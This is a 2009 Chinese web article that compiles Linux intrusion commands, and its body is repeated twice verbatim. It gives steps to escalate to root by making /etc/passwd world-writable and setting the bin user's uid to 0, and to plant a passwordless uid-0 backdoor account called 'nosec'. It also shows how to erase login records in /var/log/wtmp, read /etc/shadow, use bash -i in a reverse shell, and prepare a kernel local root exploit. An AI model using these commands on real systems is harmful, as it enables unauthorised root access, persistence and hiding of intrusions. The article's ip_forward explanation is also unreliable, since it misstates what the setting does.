linux 入侵常用命令匯編
更新時間:2009年07月09日 23:51:28 作者:
掌握這些命令也有助于配置linux的安全,大家可以看看。
cat /etc/passwd 查看linux用戶
cat /etc/shadow 查看用戶密碼需要root權(quán)限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網(wǎng)卡號 查看所在網(wǎng)卡的ip信息
ifconfig 查看本機ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反彈的shell中使用可以直觀顯示命令
bash prompt: 當你以普通限權(quán)用戶身份進入的時候,一般你會有一個類似bash$的prompt。當你以Root登陸時,你的prompt會變成
bash#。
系統(tǒng)變量 : 試著echo "$USER / $EUID" 系統(tǒng)應(yīng)該會告訴你它認為你是什么用戶。
echo 1>/proc/sys/net/ipv4/if_forward是不是你寫錯了,應(yīng)該是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默認是0,也就是內(nèi)核不進行數(shù)據(jù)包過濾,改為1 ,讓內(nèi)核對數(shù)據(jù)包進行filter處理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running
service --status-all | grep http
查看運行服務(wù)
lsb_release -a 查看系統(tǒng)版本
重啟ssh服務(wù) :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
將其改為
PasswordAuthentication yes
遠程ssh才可登錄
否則顯示Access denied
其中Usepam yes可能用來建立pam方式login,比如從其它linux主機ssh到服務(wù)端,如果關(guān)閉,則不能打開.
su的菜鳥用法
先chomod 777 /etc/passwd
然后修改bin用戶的gid和uid為0
然后passwd設(shè)置bin的密碼
然后cp /bin/bash /sbin/nologin
然后su的時候su - bin就可以到rootshell了。
這個原理就是當ssh不允許root用ssh終端登陸的時候,我們又不知道root密碼,的一種很菜鳥的做法
還可以這樣
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
清空last記錄 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一個100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提權(quán)的時候要用到的。
cat /etc/shadow 查看用戶密碼需要root權(quán)限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表網(wǎng)卡號 查看所在網(wǎng)卡的ip信息
ifconfig 查看本機ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反彈的shell中使用可以直觀顯示命令
bash prompt: 當你以普通限權(quán)用戶身份進入的時候,一般你會有一個類似bash$的prompt。當你以Root登陸時,你的prompt會變成
bash#。
系統(tǒng)變量 : 試著echo "$USER / $EUID" 系統(tǒng)應(yīng)該會告訴你它認為你是什么用戶。
echo 1>/proc/sys/net/ipv4/if_forward是不是你寫錯了,應(yīng)該是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默認是0,也就是內(nèi)核不進行數(shù)據(jù)包過濾,改為1 ,讓內(nèi)核對數(shù)據(jù)包進行filter處理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running
service --status-all | grep http
查看運行服務(wù)
lsb_release -a 查看系統(tǒng)版本
重啟ssh服務(wù) :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
將其改為
PasswordAuthentication yes
遠程ssh才可登錄
否則顯示Access denied
其中Usepam yes可能用來建立pam方式login,比如從其它linux主機ssh到服務(wù)端,如果關(guān)閉,則不能打開.
su的菜鳥用法
先chomod 777 /etc/passwd
然后修改bin用戶的gid和uid為0
然后passwd設(shè)置bin的密碼
然后cp /bin/bash /sbin/nologin
然后su的時候su - bin就可以到rootshell了。
這個原理就是當ssh不允許root用ssh終端登陸的時候,我們又不知道root密碼,的一種很菜鳥的做法
還可以這樣
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
清空last記錄 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一個100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提權(quán)的時候要用到的。
相關(guān)文章
阿里云ECS(linux)一鍵安裝web環(huán)境sh安裝步驟
這篇文章主要介紹了阿里云ECS(linux)一鍵安裝web環(huán)境sh安裝步驟,需要的朋友可以參考下2016-10-10Apache實現(xiàn)禁止中文瀏覽器訪問與301重定向的方法
這篇文章主要介紹了Apache實現(xiàn)禁止中文瀏覽器訪問與301重定向的方法,通過修改.htaccess的配置來實現(xiàn)非常簡便,需要的朋友可以參考下2016-01-01